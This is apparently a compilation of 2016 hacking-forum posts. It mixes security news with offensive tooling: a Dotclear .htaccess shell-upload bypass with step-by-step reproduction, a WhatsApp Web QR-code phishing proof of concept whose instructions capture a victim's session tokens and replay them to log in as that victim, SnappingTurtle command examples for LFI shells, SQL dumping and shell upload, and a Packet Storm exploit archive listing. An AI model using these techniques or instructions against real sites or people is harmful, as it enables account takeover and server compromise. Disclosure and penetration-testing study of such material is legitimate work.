[Xerosploit - penetration testing toolkit]

 

Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realise efficient attacks, and also allows to carry out denial of service attacks and port scanning. Powered by bettercap and nmap.

 

Dependencies

 

• nmap
• hping3
• build-essential
• ruby-dev
• libpcap-dev
• libgmp3-dev
• tabulate
• terminaltables

 

Instalation

 

Dependencies will be automatically installed.
 

git clone https://github.com/LionSec/xerosploit cd xerosploit && sudo python install.py sudo xerosploit

 

Tested on

Operative system	Version
Ubuntu	16.04 / 15.10
Kali linux	Rolling / Sana
Parrot OS	3.1

 

 

Features

• Port scanning
• Network mapping
• Dos attack
• Html code injection
• Javascript code injection
• Download intercaption and replacement
• Sniffing
• Dns spoofing
• Background audio reproduction
• Images replacement
• Drifnet
• Webpage defacement and more ...

 

Demonstration

 

 

Contact:

 

• Website : http://lionsec.net
• Youtube : https://youtube.com/inf98es
• Facebook : https://facebook.com/in98
• Twitter: @LionSec1
• Email : ledonman@gmail.com

 

Download

 

Source

 

[Dotclear 2.9.1 Shell Upload]

Dotclear version 2.9.1 suffers from a remote shell upload vulnerability.

 

#############################################
Dotclear 2.9.1 Malicious File Upload Restriction Bypass
#############################################

[+] Software: https://dotclear.org/
[+] Author: Wiswat Aswamenakul
[+] Affected version: only tested on 2.9.1 (previous version might be
affected)
[+] Platform: tested on Ubuntu 14.04, PHP 5.5.9
[+] Description
Dotclear has a feature to upload files in Media Manager. However, by
default, there is a filtering to prevent authenticated users to upload
malicious files, such PHP code, to execute on the server. The default
filter is as following.
/\.(phps?|pht(ml)?|phl|s?html?|js)[0-9]*$/i (PCRE)
The above filter does not filter .htaccess file which allows
authenticated users to upload .htaccess file to the server which enable
PHP code execution on any file extension.


[+] Attack Reproduce

Note: in order for this exploit to work, it is required that apache
configuration allow the usage of .htaccess file on dotclear directory
(dotclear itself has .htaccess to restrict access to cache folder by
default)

1. Create htaccess file with following content
AddType application/x-httpd-php .xpl

2. Upload htaccess file through local proxy, such as burp suite, and
change file name to "..htaccess"

3. Create file "shell.xpl" with following content
<?php
phpinfo();
?>

4. Upload "shell.xpl" to dotclear

5. Open the uploaded shell.xpl

[+] Solution
Suggested solutions require re-design of Dotclear which might cause
significant time to implement. As a result, the author designed to
implement suggested interrim solution in Dotclear version 2.10 to fix this
vulnerability

[+] Timeline
- 12/07/2016 - Report vulnerability
- 12/07/2016 - Dotclear acknowledge the vulnerability
- 12/07/2016 - Fix is available in Dotclear trac
- 13/08/2016 - Dotclear 2.10 is avaible for download
- 24/08/2016 - Public Disclosure

Thank you Dotclear authors for swift response and taking security issues
importantly

 

Source

[Opera Browser Sync Service Hacked; Users' Data and Saved Passwords Compromised]

 

Opera has reset passwords of all users for one of its services after hackers were able to gain access to one of its Cloud servers this week.

Opera Software reported a security breach last night, which affects all users of the sync feature of its web browser.

So, if you’ve been using Opera’s Cloud Sync service, which allows users to synchronize their browser data and settings across multiple platforms, you may have hacked your passwords, login names, and other sensitive data.

 

Quote

Opera confirmed its server breach on Friday, saying the "attack was quickly blocked" but that it "believe some data, including some of [their] sync users’ passwords and account information, such as login names, may have been compromised."

 

Opera has around 350 Million users across its range products, but around 1.7 Million users using its Sync service had both their synchronized passwords as well as their authentication passwords leaked in the hack.

Since the company has already reset passwords of all of its registered Opera Sync users and emailed them with details, you need not worry about your account.

 

Quote

"Although we only store encrypted (for synchronized passwords) or hashed and salted (for authentication) passwords in this system, we have reset all the Opera sync account passwords as a precaution," Opera Software explained in a blog post.

 

 

Additionally, the company has also informed all Opera Sync users about the security breach and recommended them to change passwords for their Opera Sync accounts as soon as possible. You can obtain a new password for Opera sync using the password resetting page.

The complete details about the intrusion and extent of the breach are yet unknown.

Opera Software encouraged users to reset passwords for any third party websites they may have synced with its service.

However, if you are the one using the same password for multiple sites, you are also advised to change your passwords for those sites manually.

Since we’ve repeatedly seen folks reusing passwords across multiple services with recent high-profile account hacking, you are advised to use a good password manager always to keep a strong, unique password for your online accounts.

We have listed some best password managers that would help you understand the importance of password managers and choose a suitable one according to your requirement.

 

Via thehackernews.com

[vand mail-uri orice tara]

33 minutes ago, jokerusa2016 said:

salut,mai ai mailuri de vanzare?

Nu.

[Wireshark]

sniff.su

sau

http://lifehacker.com/how-to-tap-your-network-and-see-everything-that-happens-1649292940

[Info on 500K Users Doxxed in Hacking Forum Dump]

 

An underground forum called Nulled.io that helped users share stolen credentials, software cracks, and leaked content was hacked earlier this month, spilling a glut of information, including users’ email addresses, encrypted passwords, and IP addresses, among other details. According to researchers at Risk Based Security who reported the breach last week, a 1.3 GB tar.gz file, which expanded to a massive 9.45 GB SQL file was leaked on May 6. A deluge of information relating to the message board was leaked, including details on roughly 536,064 registered users – and 800,593 personal messages between them, according to the firm. The site, which ironically goes by the tagline “Expect the unexpected,” is currently offline. A placeholder message claims the service is experiencing “temporary unscheduled maintenance.

Usernames for patrons of the site were leaked; along with the dates they registered, IP addresses they used to register for the service, and their encrypted passwords. Information on how some users paid, including payment methods, PayPal emails, dates, and costs, listed in table form, were leaked as well. Other potentially personally identifiable information, including 2.2 million posts, many which were previously private and part of a VIP section, were dumped as well, along with API credentials for three payment gateways, and more than 907,000 authentication logs. According to Risk Based Security, information from those logs – including geolocation data, member ID and IP addresses, and user donation records – could be cobbled together and matched with member ID numbers. Technically 5,582 purchase records and 12,600 invoices – which link back to those donation records – were also dumped, according to the firm. It’s unclear exactly how the forum was breached but as Risk Based Security points out, the site was running a type of forum, IP.Board, made by Invasion Power Services, Inc., that has several documented vulnerabilities. The firm notes that 185 total vulnerabilities exist in IP.Board, 92 which don’t have a CVE. According to a blog post by the firm last Tuesday, the last user to log into the forum did so that previous Friday, May 6, suggesting the breach may have occurred late that night. Later that weekend, Daniel Cid, CTO/Founder of Sucuri, a web security firm, warned on Twitter that forums could be a “sweet spot” for attackers looking to exploit the ImageTragick vulnerability, adding that he had noticed some attempts against IP.Board, in addition to vBulletin forums.

 

 

 

Quote

 

 

Daniel Cid ‏@danielcid

In addtiion to vBulletin, seeing a few #ImageTragick attempts against "app=members&module=profile&section=photo&do=save" on IP.Board

 

•  

  Daniel Cid ‏@danielcid May 8

  @danielcid Forums seem to be the sweet spot for #ImageTragick.

  0 retweets 0 likes

   

 

 

 

Vulnerabilities in ImageMagick, a type of open source image processing software, were outlined earlier this month. Attackers could leverage the vulnerabilities by affixing malicious code to an image file that the software processes and in turn, triggers remote code execution. For what it’s worth, while combing through the Nulled.IO database, Risk Based Security noticed that 365 users who accessed the site used .edu addresses. Eight other users accessed the site via .gov addresses, and emails stemming from government domains in Jordan, Brazil, Malaysia, and Turkey. When it comes to the leaked information, it likely won’t be too difficult for anyone, law enforcement included, to connect the dots. “When services such as Nulled.IO are compromised and data is leaked, often it exposes members who prefer to remain anonymous and hide behind screen names,” the firm wrote Tuesday, “By simply searching by email or IP addresses, it can become evident who might be behind various malicious deeds.” “With this being such a comprehensive dump of data it offers up a very good set of information for matching a member ID to the attached invoices, transactions and other content such as member messages and posts,” the firm warns.

 

Via

[Password For BruteForce]

https://wiki.skullsecurity.org/Passwords

[DARPA Wants To Build Ultra Secure Messaging App for US Military]

 

 

Just last month, DARPA launched a project dubbed "Improv," inviting hackers to transform simple household appliances into deadly weapons.

Now, the Defense Advanced Research Projects Agency is finding someone in the private sector to develop a hacker-proof "secure messaging and transaction platform" for the U.S. military.

Darpa wants researchers to create a secure messaging and transaction platform that should be accessible via the web browser or standalone native application.

The secure messaging app should "separate the message creation, from the transfer (transport) and reception of the message using a decentralized messaging backbone to allow anyone anywhere the ability to send a secure message or conduct other transactions across multiple channels traceable in a decentralized ledger," agency's notice explains.

In simple words, DARPA aims to create a secure messaging service that not only implements the standard encryption and security mechanisms used by other secure messaging apps like Signal, Ricochet, and Whatsapp but also communicates via a secure decentralized protocol like Blockchain to prevent cyber attacks and surveillance.

The secure messaging app will be developed in three phases:

 

• First Phase: Create a model for an existing decentralized blockchain-like platform and experiment with encryption protocols and hardware options.
• Second Phase: Develop and test the "working prototype."
• Third Phase: commercialize and full-scale implementation of the platform.

 

Also Read: The Best Way to Send and Receive End-to-End Encrypted Emails.

During the first round, the DARPA will award $150,000 per year to the successful applicants. The phase one candidates can then be eligible for a second round award of up to $1 Million for two years.

During the final and third phase, the selected candidates can then pursue commercialization and full-scale implementation of their platform, without receiving any fund from the federal government.

The solicitation will officially open on May 23, 2016 and will close on June 22, 2016.

 

Via

 

 

[Whatsapp phishing]

Whatsapp phishing

This repo contains proof of principle code for running a phishing attack against the official Whatsapp Web client. I also wrote about it on my German blog

 

Whatsapp what?

http://www.whatsapp.com/faq/web/28080003

Short: A web client for Whatsapp. You log in by scanning a QR code on there page using Whatsapp

 

What does it do

It will extract the QR code from Whatsapp Web and display it on a new page. If someone scans the code using Whatsapp it will grab the credentials from the web client and save them in a file. You can use these credentials to log yourself in as the person who scanned to QR code.

 

How does it work

The program uses node.js and socket.io for the website and selenium, a tool for scripting browsers, to communicate with the Whatsapp web client.

The program starts a http and a socket.io server. If a new client connects to socket.io the application will make a request to a selenium instance to start a new browser and connect to web.whatsapp.com. It will fetch the QR code data and send it to the client via the websocket connection. The client javascript then shows the QR code to the user.

If the QR code gets scanned Whatsapp will authenticate the selenium controlled browser and store some tokens in the localStorage and document.cookie. We extract that data and save it into a text file. It will look like so:

 

 

{
   "s":{
      "remember-me":"true",
      "WAVersion":"\"0.1.4391\"",
      "qwefsdafadsdf==":"false",
      "debugCursor":"146",
      "WAWamDimensionCache":"{\"AppVersion\":\"0.1.4391\",\"BrowserVersion\":\"Firefox 39.0\",\"DeviceName\":\"Linux x86_64\",\"WebcEnv\":0}",
      "WAToken2":"\"0.asldkamäsdflkasdfasdf\"",
      "WAWamLastRotate":"1439140177924",
      "WALangPref":"\"de-DE\"",
      "WAWamStatus":"\"completed\"",
      "y8fY/zQ8P+asdfadfg==":"[
        ...
      ]",
      "WAToken1":"\"asdf+ams,dfhlaskdjfhasdfasdf=\"",
      "Dexie.DatabaseNames":"[\"wawc\"]",
      "storage_test":"storage_test",
      "LKAJsdlksdjfasdf==":"false",
      "logout-token":"\"alkjsdhfkjashldkjpweoaLKNKASBkasjbdaksdjLKjhhndosiaosa;AljkhJKhlKAJShkljqjDJSAOlkjbnhasdklWAdm==\"",
      "ver":"1",
      "whatsapp-mutex":"\"x781239870495:init0.987123490234\"",
      "WASecretBundle":"{\"key\":\"sldkfjsdf+asdlfijlasdkjfasdf=\",\"encKey\":\"asldkfjasldkfjsdfsdf0=\",\"macKey\":\"a,sdfasdf+alskdjföalskdhiopasdf=\"}",
      "WABrowserId":"\"aö,ksdjflöasdf==\""
   },
   "c":""
}

 

You can than import these tokens into your browser and log in as the person who scanned the QR code.

 

Instructions

• Download the selenium standalone server jar file and install Firefox if you don't already have it.
• Type the following into your terminal:

$ java -jar selenium-server.jar
$ # new terminal
$ git clone https://github.com/Mawalu/whatsapp-phishing.git
$ cd whatsapp-phishing
$ npm install
$ node index.js

• Open your browser and go to http://localhost:8080
• Start Whatsapp on your smartphone, go to Menu > Whatsapp Web and scan the QR code from your browser.
• Copy the content from the newly created secrets file
• Open web.whatsapp.com. (Watch out that you are not already logged in, maybe use incognito mode)
• Open your developer console
• Enter the following code:

> var t = CONTENT_OF_YOUR_SECRETS_FILE
> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });}
> login(t)

• Reload the page
• You should be logged in as the person who scanned the QR code

 

Disclaimer

Whatsapp messages are meant to be private. Just because the NSA reads everything it doesn't mean you should do as well! Everything in this repo is for education purpose only and I am not responsible if you use it otherwise.

 

Author: Martin Wagner (Mawalu)

Download ZIP

 

https://github.com/Mawalu/whatsapp-phishing

 

[Hacker Hijacks a Police Drone from 2 Km Away with $40 Kit]

 

A researcher has demonstrated how easy it is to steal high-end drones, commonly deployed by government agencies and police forces, from 2 kilometres away with the help of less than $40 worth of hardware.

 

The attack was developed by IBM security researcher Nils Rodday, who recently presented his findings at Black Hat Asia 2016.

 

Hacking the $28,463 Drone with Less than $40 of Hardware

 

Rodday explained how security vulnerabilities in a drone's radio connection could leverage an attacker (with some basic knowledge of radio communications) to hijack the US$28,463 quadcopters with less than $40 of hardware.

 

Rodday discovered (PPT) two security flaws in the tested drone that gave him the ability to hack the device in seconds.

 

First, the connection between drone's controller module, known as telemetry box, and a user’s tablet uses extremely vulnerable 'WEP' (Wired-Equivalent Privacy) encryption – a protocol long known to be 'crackable in seconds.'

 

This flaw could be exploited by any attacker in Wi-Fi range of 100 meters to break into that connection and send a malicious command that disconnects the drone's owner of the network.

 

Second, the onboard chips used for communication between that telemetry module and the drone uses even less-secured radio protocol.

Hijacking Drones from 2 Kms Away

 

 

The module and drone communicate using 'Xbee' chip, created by the Minnesota-based chipmaker Digi International and is commonly used in unmanned aerial vehicles (UAVs) everywhere.

 

According to Rodday, Xbee chips do have built-in encryption capabilities, but for avoiding latency between the drone and the user's commands, the chips doesn't implement encryption.

 

This issue leaves the drones open to 'Man-in-the-Middle' (MitM) attacks, leveraging an attacker to intercept everything happening on the UAVs network connection and inject commands between the drone and the telemetry box from up to 2 kilometres away.

 

Furthermore, Rodday also warned that any sophisticated hacker with the ability to reverse engineer the drone's software would be able to send navigational controls, block all commands from the real operator, or even crash it to the ground.

 

Rodday's research proves that there are critical issues with what's likely the most expensive drone yet, as well as one that is used for more serious purposes than high-altitude selfies, which needs to be considered seriously.

 

Via thehackernews.com

[Packet Storm New Exploits For March, 2016]

This archive contains all of the 196 exploits added to Packet Storm in March, 2016.

 

Content:

 

Directory of 1603-exploits

03/21/2016  07:04 PM             2,220 ABSOLUTETELNET-DLL-HIJACK.txt
03/22/2016  03:00 AM               471 achievo145-xss.txt
03/17/2016  08:39 AM             1,428 akips-exec.txt
03/31/2016  03:07 AM             6,288 apache_jetspeed_file_upload.rb.txt
03/03/2016  04:12 AM             5,037 applocker_bypass.rb.txt
03/08/2016  02:30 AM             4,455 atutorlms-exec.txt
03/30/2016  02:35 AM            13,044 atutor_filemanager_traversal.rb.txt
03/01/2016  05:17 PM            10,902 atutor_sqli.rb.txt
03/31/2016  07:44 AM               664 axilcms01-sql.txt
03/31/2016  06:33 AM               689 axilcms3-xss.txt
03/18/2016  06:48 PM             5,266 bigtree428-inject.txt
03/28/2016  02:11 PM             1,866 c2box-bypass.txt
03/17/2016  08:51 AM             2,088 ciscoucs-exec.txt
03/07/2016  01:33 PM             2,427 clamwin-dllhijack.txt
03/29/2016  02:40 AM             2,257 cogentdatahub-escalate.txt
03/24/2016  02:16 AM             2,710 comodo-dllhijack.txt
03/11/2016  07:12 AM            10,651 CORE-2016-0003.txt
03/11/2016  07:15 AM            19,515 CORE-2016-0004.txt
03/17/2016  08:45 AM            11,992 CORE-2016-0005.txt
03/31/2016  02:41 AM           970,293 COSIG-2016-14-15-16.tgz
03/30/2016  06:39 PM             6,099 cubecart6010-sqlxssxsrf.txt
03/31/2016  02:32 AM               922 CVE-2016-0784.txt
03/11/2016  06:56 AM            10,584 cve-2016-2563.tgz
03/19/2016  03:05 AM             5,874 datingpro-xsrf.txt
03/29/2016  06:14 PM             3,650 desktopcentral-xss.txt
03/28/2016  07:44 AM             1,498 dlinkdvg5402sp-xsrf.txt
03/21/2016  06:50 PM             2,119 dlinkdwr932-bypass.txt
03/21/2016  08:55 AM               644 dorg-sqlxss.txt
03/15/2016  09:22 PM            18,254 dropbearsshd-bypass.txt
03/30/2016  06:28 PM             6,530 ehcp-bypassupload.txt
03/08/2016  11:11 PM               645 exim-escalate.txt
03/15/2016  02:50 AM             6,923 Exim-Local-Root-Privilege-Escalation.txt
03/29/2016  04:33 PM             1,821 firewarextm-redirect.txt
03/24/2016  06:55 PM               712 Forsploit.py.txt
03/19/2016  04:11 PM             1,342 fortios-redirectxss.txt
03/18/2016  06:55 PM             4,712 grandstream-redir.txt
03/04/2016  04:07 AM             1,832 GS20160304010751.tgz
03/05/2016  04:11 AM           112,325 GS20160305011130.tgz
03/07/2016  05:44 PM             1,547 GS20160307233508.tgz
03/11/2016  04:22 AM             1,977 GS20160311042036.tgz
03/16/2016  09:18 PM             2,289 GS20160317052509.tgz
03/16/2016  08:22 PM             1,833 GS20160317053119.tgz
03/17/2016  08:33 AM             2,503 GS20160317053347.tgz
03/17/2016  08:35 AM             2,788 GS20160317053502.tgz
03/17/2016  08:36 AM             2,785 GS20160317053619.tgz
03/19/2016  03:00 AM             2,272 GS20160319000832.tgz
03/22/2016  03:09 AM             1,697 GS20160322000957.tgz
03/22/2016  03:11 AM             1,974 GS20160322001128.tgz
03/22/2016  03:17 AM             1,715 GS20160322001342.tgz
03/22/2016  03:19 AM             1,886 GS20160322001921.tgz
03/22/2016  03:22 AM             2,731 GS20160322002200.tgz
03/22/2016  03:23 AM             1,705 GS20160322002341.tgz
03/23/2016  02:39 AM             3,342 GS20160322233924.tgz
03/23/2016  02:42 AM             2,014 GS20160322234207.tgz
03/23/2016  02:43 AM             1,952 GS20160322234346.tgz
03/23/2016  02:44 AM             1,694 GS20160322234451.tgz
03/23/2016  02:46 AM             1,411 GS20160322234611.tgz
03/23/2016  02:48 AM             1,144 GS20160322234851.tgz
03/23/2016  02:49 AM             1,959 GS20160322234954.tgz
03/23/2016  02:51 AM             1,980 GS20160322235135.tgz
03/23/2016  02:53 AM             1,981 GS20160322235307.tgz
03/23/2016  02:54 AM             1,139 GS20160322235438.tgz
03/23/2016  02:55 AM             1,782 GS20160322235529.tgz
03/23/2016  01:22 AM             1,058 GS20160322235642.tgz
03/23/2016  02:58 AM             1,401 GS20160322235811.tgz
03/23/2016  03:00 AM             2,094 GS20160323000002.tgz
03/23/2016  03:02 AM             3,188 GS20160323000202.tgz
03/23/2016  03:04 AM             2,852 GS20160323000415.tgz
03/23/2016  03:21 AM             2,219 GS20160323002103.tgz
03/23/2016  03:22 AM             1,961 GS20160323002237.tgz
03/23/2016  03:25 AM             1,450 GS20160323002510.tgz
03/23/2016  03:26 AM             5,826 GS20160323002624.tgz
03/25/2016  11:22 PM             1,315 GS20160325232526.tgz
03/25/2016  07:22 PM             4,902 GS20160325232718.tgz
03/28/2016  02:12 PM             4,822 GS20160328155434.tgz
03/29/2016  06:55 PM             6,197 GS20160330235852.tgz
03/31/2016  06:42 PM             2,784 GS20160331154242.tgz
04/01/2016  02:34 AM             1,581 GS20160331233412.tgz
04/01/2016  02:35 AM             2,328 GS20160331233533.tgz
04/01/2016  02:36 AM             1,659 GS20160331233658.tgz
04/01/2016  02:38 AM             2,479 GS20160331233817.tgz
04/01/2016  02:39 AM             1,503 GS20160331233926.tgz
04/01/2016  02:40 AM             1,828 GS20160331234039.tgz
03/24/2016  02:29 AM             4,088 h264-dvr-rce.py.txt
03/19/2016  03:03 AM             4,231 itop-xsrf.txt
03/23/2016  03:00 AM               718 joomlaeytg102-sql.txt
03/23/2016  03:00 AM             1,614 joomlaicagenda-xss.txt
03/12/2016  11:22 PM             4,345 kaltura-execuploadfileread.txt
03/04/2016  01:22 AM             5,151 liferay512-xss.txt
03/16/2016  07:17 PM             1,844 litecartcms-xss.txt
03/24/2016  03:44 PM             2,112 lithiumkb-xss.txt
03/09/2016  07:44 PM             5,665 LSE-2016-01-01.txt
03/07/2016  01:32 PM             3,483 mbam-dllhijack.txt
03/05/2016  04:09 AM             9,832 mcafeevses-bypass.txt
03/31/2016  06:06 PM             4,195 meea-xss.txt
03/31/2016  02:52 AM         3,840,115 metaphor-stagefright.tgz
03/01/2016  05:12 PM             2,265 MICROSOFT-PPT-VIEWER-CODE-EXEC.txt
03/16/2016  07:11 PM             1,149 netgearcg3000-bypass.txt
03/13/2016  01:22 AM             5,543 netgearreadynas-exec.txt
03/16/2016  07:04 PM            18,512 opensshfalse-bypass.txt
03/09/2016  07:46 PM            26,493 OSS-2016-05_aiptek.txt
03/09/2016  07:48 PM            26,517 OSS-2016-06_cdc_acm.txt
03/09/2016  07:50 PM            28,311 OSS-2016-07_cypress_m8.txt
03/09/2016  07:57 PM            27,815 OSS-2016-08_mct_u232.txt
03/09/2016  07:58 PM            26,958 OSS-2016-09_visor_clie_5_attach.txt
03/09/2016  08:00 PM            27,717 OSS-2016-10_visor_treo_attach.txt
03/09/2016  08:01 PM            50,845 OSS-2016-11_wacom.txt
03/09/2016  08:03 PM            26,477 OSS-2016-12_digi_acceleport.txt
03/12/2016  05:44 PM            27,188 OSS-2016-13_powermate.txt
03/12/2016  05:45 PM            27,911 OSS-2016-14_gtco.txt
03/12/2016  06:20 PM            27,599 OSS-2016-15_iowarrior.txt
03/12/2016  07:32 PM            27,185 OSS-2016-16_snd-usb-audio.txt
03/12/2016  08:32 PM            26,819 OSS-2016-17_snd-usb-audio.txt
03/12/2016  09:32 PM            51,078 OSS-2016-18_ati_remote2.txt
03/31/2016  08:55 AM             9,664 php5533-invalidwrite.txt
03/11/2016  07:25 AM             2,063 php_utility_belt_rce.rb.txt
03/18/2016  06:47 PM             1,754 pivotx2311-shell.txt
03/18/2016  06:45 PM             2,085 pivotx2311-traversal.txt
03/18/2016  06:43 PM             1,482 pivotx2311-xss.txt
03/17/2016  04:56 PM             4,128 projectsendr582-xss.txt
03/03/2016  03:02 AM             1,244 pulsecms452-disclose.txt
03/02/2016  05:01 PM             1,891 putty066-dllhijack.txt
03/22/2016  06:03 PM             5,308 rt-sa-2016-002.txt
03/04/2016  03:41 AM             4,667 schneiderelectric-credexecescalate.txt
03/11/2016  07:09 AM           520,775 SE-2012-01-ORACLE-14.tgz
03/03/2016  03:02 AM         1,492,772 secretnet_expl-master.zip
03/27/2016  02:11 PM             2,863 smsofttech-sql.txt
03/13/2016  01:02 AM             1,549 soundybm-xss.txt
03/21/2016  03:22 AM             4,803 sysax650-sehoverflow.txt
03/05/2016  04:02 AM             5,423 SYSS-2015-053.txt
03/01/2016  05:01 PM             6,840 SYSS-2015-066.txt
03/01/2016  04:55 PM             5,077 SYSS-2015-067.txt
03/01/2016  04:58 PM             5,241 SYSS-2015-069.txt
03/01/2016  04:54 PM             5,655 SYSS-2015-070.txt
03/01/2016  04:56 PM             6,661 SYSS-2015-071.txt
03/01/2016  04:59 PM             5,594 SYSS-2015-072.txt
03/01/2016  04:58 PM             4,964 SYSS-2015-073.txt
03/01/2016  05:06 PM             4,862 SYSS-2016-009.txt
03/24/2016  10:32 PM             5,006 SYSS-2016-016.txt
03/24/2016  10:33 PM             4,712 SYSS-2016-017.txt
03/25/2016  02:02 AM             4,950 SYSS-2016-018.txt
03/29/2016  02:38 AM               687 tallsoft-dos.txt
03/09/2016  07:42 PM             3,645 thomsontwg8504u-xsrfxss.txt
03/28/2016  06:52 PM            15,239 TRENDMICRO-DDI-CSRF.txt
03/30/2016  06:33 AM            16,565 VL-1627.txt
03/31/2016  06:36 PM            24,540 VL-1694.txt
03/14/2016  01:11 PM             6,744 VL-1777.txt
03/16/2016  03:02 AM            10,147 VL-1781.txt
03/24/2016  02:21 AM             4,224 VL-1783.txt
03/31/2016  09:55 AM             8,023 VL-1784.txt
03/31/2016  06:28 PM             6,932 VL-1785.txt
03/24/2016  09:02 PM             4,329 VL-1788.txt
03/31/2016  06:29 PM             5,689 VL-1802.txt
03/31/2016  06:31 PM             5,787 VL-1803.txt
03/31/2016  06:33 PM             6,772 VL-1804.txt
03/31/2016  06:38 PM             8,420 VL-1806.txt
03/31/2016  06:35 PM             6,172 VL-1807.txt
03/04/2016  03:37 AM             9,074 wago-credsprivdisclose.txt
03/27/2016  02:12 PM             3,284 wapmusiccms-sql.txt
03/19/2016  03:07 AM             4,232 websitebaker-sql.txt
03/21/2016  08:22 AM           628,511 wildfly-bypass.tgz
03/21/2016  07:22 AM               580 wpabtest-lfi.txt
03/09/2016  06:55 PM            38,332 WPAdvancedComment010-xss.pdf
03/23/2016  03:29 AM             1,478 wpbrandfolder-rfilfi.txt
03/03/2016  07:51 PM             3,638 wpbulkdelete-escalate.txt
03/15/2016  06:33 AM             1,180 wpbulletproof0532-xss.txt
03/28/2016  06:34 PM             2,879 wpclaptasticclap-xss.txt
03/28/2016  06:35 PM             2,753 wpcloudflare-xss.txt
03/02/2016  05:04 PM             5,665 wpcppolls108-xsrfxss.txt
03/02/2016  04:33 PM             3,403 wpcppolls108-xssupload.txt
03/23/2016  03:30 AM               887 wpdharmabooking-rfilfi.txt
03/12/2016  07:22 PM             2,306 wpdwquestionanswer-xss.txt
03/21/2016  10:22 AM               614 wpebookdownload-traversal.txt
03/12/2016  05:03 PM             1,551 wpemailencoderbundle-xss.txt
03/24/2016  02:19 AM             3,043 wpfacebookwl-sqlxss.txt
03/01/2016  05:05 PM             2,339 wpgravityforms-xss.txt
03/22/2016  05:59 PM               809 wphbaudiogallerylite-download.txt
03/28/2016  06:38 PM               601 wpimdb-lfi.txt
03/21/2016  09:22 AM               740 wpimportcsv-traversal.txt
03/24/2016  02:20 AM               612 wpissuupanel-rfilfi.txt
03/24/2016  02:18 AM             1,048 wpmailchimpsf-exec.txt
03/12/2016  05:44 PM             1,355 wpmailtolinks-xss.txt
03/23/2016  03:32 AM             1,300 wpmemphisdoclib-download.txt
03/28/2016  06:35 PM             2,750 wpmusicstore-xss.txt
03/28/2016  06:40 PM               825 wpphotocartlink-lfi.txt
03/07/2016  11:32 PM             4,815 wpspprojectsdm-sqlexecuploadxss.txt
03/28/2016  06:37 PM             2,755 wpvisualformbuilder-xss.txt
03/11/2016  07:00 AM            19,807 X41-2016-001.txt
03/19/2016  02:59 AM             2,343 XOOPS-CSRF.txt
03/19/2016  02:58 AM             2,161 XOOPS-DIRECTORY-TRAVERSAL.txt
03/18/2016  06:42 PM             3,159 zenphoto1411-rfi.txt
03/01/2016  05:08 PM             3,763 ZSL-2016-5309.tgz
03/01/2016  05:10 PM             5,410 ZSL-2016-5310.txt
03/16/2016  05:47 AM             3,472 ZSL-2016-5311.txt
03/31/2016  02:33 AM             4,367 ZSL-2016-5312.txt
03/24/2016  02:35 AM             3,498 zyxelmax3xx-hardcoded.txt
             197 File(s)      8,745,358 bytes
               2 Dir(s)   5,041,963,008 bytes free

 

Download 1603-exploits.tgz (7.7 MB)

[OWASP Mth3l3m3nt Framework Project]

 

OWASP Mth3l3m3nt Framework is a penetration testing aiding tool and exploitation framework. Mth3l3m3nt provides the ability to create or do custom LFI and RFI exploits fast with little or no effort at all. It also enables you to store all your quick wins based on its ability to manage HTTP bots, say no to runaway web shells and yes to centrally managed herds in large penetration testing engagements.

 

Description
The purpose of this project is to provide a platform to enable more flexible testing especially in aspects regarding to web security and the OWASP top 10 threats to web applications. This will enable free and opensource collaboration, being a web based tool, it is intended to make offensive security on the web easier and more efficient as it leverages on existing technologies with few dependencies. It is built on purely opensource components. It is intended to build up to a fully fledged web penetration testing framework with extensibility for zero day exploits in minutes to users. Currently the features it offers:

 

• Multi-Database Support (JIG,SQLite,MySQL,MongoDB,PostgreSQL,MSSQL)
• LFI/RFI exploitation Module
• Web Shell Generator (ASP,PHP,JSP,JSPX,CFM)
• Payload Encoder and Decoder
• Custom Web Requester (GET/HEAD/TRACE/OPTIONS/POST)
• Web Herd (HTTP Bot tool to manage web shells)
• Client Side Obfuscator
• String Tools
• Whois

 

Quick Download
The home of the OWASP Mth3l3m3nt Framework is on GitHub. You are encouraged to fork, edit and push your changes back to the project through git or edit the project directly on github.

However, if you like you may also download the master repository from the following links:

 

• .zip file.
• .tgz file.

 

Source

 

[SnappingTutle: A Web Exploitation Tool]

# SnappingTurtle: A Web Exploitation Tool
A cross platform web exploitation tool written in Aphid and compiled into Python. Currently supports exploitation of PHP local file inclusion and SQL injection with more on the way.

## Command Line Arguments
python st.py [exploitation strategy] [url] [inputs]

## Exploitation Strategies

#### lfi
Local file inclusion mode. Attempts to create a shell by exploiting PHP local file inclusion. Injection is performed using the $lfi token.

#### sqli {options}
SQL injection mode. Attempts to automatically exploit SQL injection vulnerabilities by querying information schemas. Injection is performed using the $sqli token.

If used, one of two options must be specified:

*list* - Dumps a list of databases and tables.

*table {name}* - Dumps a database table.

#### xss {server ip}
Cross-site scripting mode. Currently only supports exploitation of reflected XSS via GET. Injection is performed using the $xss token.

If used, a target accessible server IP must be specified for listening.

#### upload
Arbitrary upload. Write data to the server using the -f option.

If used, at least one file must be specified using the -f option. Built-in shells can be injected using the $php token.

#### shell {shell url}
Connects to a previously created shell.

## Url
The url to exploit. Can be injected into using tokens.

## Inputs

#### -g {GET name} {GET value}
GET data in key/value format.
  
#### -p {POST name} {POST value}
POST data in key/value format.

#### --g {GET data}
GET data in Python map format.

#### --p {POST data}
POST data in Python map format.

#### -f {name} {filename} {file data}
POST data as a file.

## Examples

python st.py lfi http://localhost/lfiTest.php?theme=$lfi

python st.py lfi http://localhost/lfiTest.php -g theme $lfi

python st.py lfi http://localhost/lfiTest.php?theme=$lfi%00

python st.py lfi http://localhost/postTest.php --p "{'theme':'$lfi'}"

python st.py sqli list http://localhost/sqliTest.php -g email $sqli

python st.py sqli table sqlitest.users http://localhost/sqliTest.php -g email $sqli

python st.py xss 10.0.0.122 http://10.0.0.145/xss.php -g search $xss

python st.py upload http://10.0.0.145/upload.php -f file shell.php $php

python st.py shell http://10.0.0.145/shell.php

## Changelog

### 0.1.0324.1445
Added upload capability.

Added shell connection support.

Improved CLI output.

Flipped GET/POST pair/obj args.

Fixed SQL injection NULL bug.

Fixed bug in table printing.

Disabled urllib2 redirection.

### 0.1.0323.1150
Added support for XSS exploitation.

Several bug fixes.

### 0.1.0322.749
Added support for SQL injection.

Improved LFI exploitation support.

CLI improvements.

Several bug fixes.

### 0.1.0316.3
Initial release, supports LFI exploitation.

 

 

st.py

 

################################################################
